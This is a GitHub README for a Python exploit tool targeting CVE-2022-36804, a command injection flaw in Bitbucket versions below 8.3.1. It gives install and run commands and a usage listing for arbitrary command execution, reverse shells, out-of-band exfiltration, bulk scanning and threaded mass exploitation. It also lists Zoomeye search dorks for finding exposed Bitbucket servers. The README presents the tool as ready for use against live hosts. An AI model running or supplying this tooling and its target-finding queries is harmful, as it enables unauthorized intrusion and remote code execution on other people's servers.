Chocapikk/CVE-2022-36804-ReverseShell

Latest commit: Sep 24, 2022
Original Project

https://github.com/BenHays142/CVE-2022-36804-PoC-Exploit

CVE-2022-36804-PoC-Exploit

A somewhat reliable PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection). This attack generally requires public repos to be enabled; alternatively, a valid session cookie can be supplied to the exploit. Note: this exploit includes automatic repo detection, which is handy if you don't want to manually find open repos yourself.

How To Install

git clone https://github.com/Chocapikk/CVE-2022-36804-ReverseShell.git
cd CVE-2022-36804-ReverseShell
python3 -m pip install -r requirements.txt
python3 main.py --server [target]

How To Use

usage: main.py [-h] [--server SERVER] [--project PROJECT] [--repo REPO] [--skip-auto]
               [--session SESSION] [--command CMD] [--file FILE] [--output OUTPUT]
               [--lhost LHOST] [--lport LPORT] [--threads THREADS]

Exploit BitBucket Instances (< v8.3.1) using CVE-2022-36804. Exploits automagically
without any extra parameters, but allows for custom settings as well.

options:
  -h, --help         show this help message and exit
  --server SERVER    Host to attack
  --project PROJECT  The name of the project the repository resides in
  --repo REPO        The name of the repository
  --skip-auto        Skip the automatic finding of exploitable repos
  --session SESSION  Value of 'BITBUCKETSESSIONID' cookie, useful if target repo is
                     private
  --command CMD      Command to execute if exploit is successful (Note: getting output
                     isn't reliable so OOB exfil is a must)
  --file FILE        File to scan bulk hosts
  --output OUTPUT    Output file for the session
  --lhost LHOST      Your Local Host for reverse shell
  --lport LPORT      Your Local Port for reverse shell
  --threads THREADS  Threads for mass exploitation

Zoomeye Dorks

app:"Bitbucket" +banner:"repos?visibility=public"

app:"Bitbucket" +title:"public"

app:"Bitbucket"

iconhash:667017222

References

Atlassian Advisory

Atlassian Jira Issue

NIST CVE
